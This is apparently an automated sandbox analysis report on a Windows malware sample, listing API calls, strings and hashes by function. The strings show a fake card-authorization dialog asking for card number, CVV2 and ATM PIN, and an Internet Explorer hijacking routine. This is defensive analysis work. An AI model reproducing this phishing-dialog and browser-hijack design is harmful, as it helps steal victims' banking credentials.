                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 83 4079a6-4079a9 79->83 84 4079cf-4079dc GetModuleHandleA call 406c29 79->84 81 4079c0 80->81 82 4079bb-4079be 80->82 87 4079c3-4079c8 81->87 82->81 86 4079b3 82->86 85 4079ac-4079af 83->85 92 4079e1-4079e3 84->92 89 4079b1 85->89 90 4079ab 85->90 86->80 87->84 91 4079ca-4079cd 87->91 89->84 90->85 91->84 93 4079c2 91->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
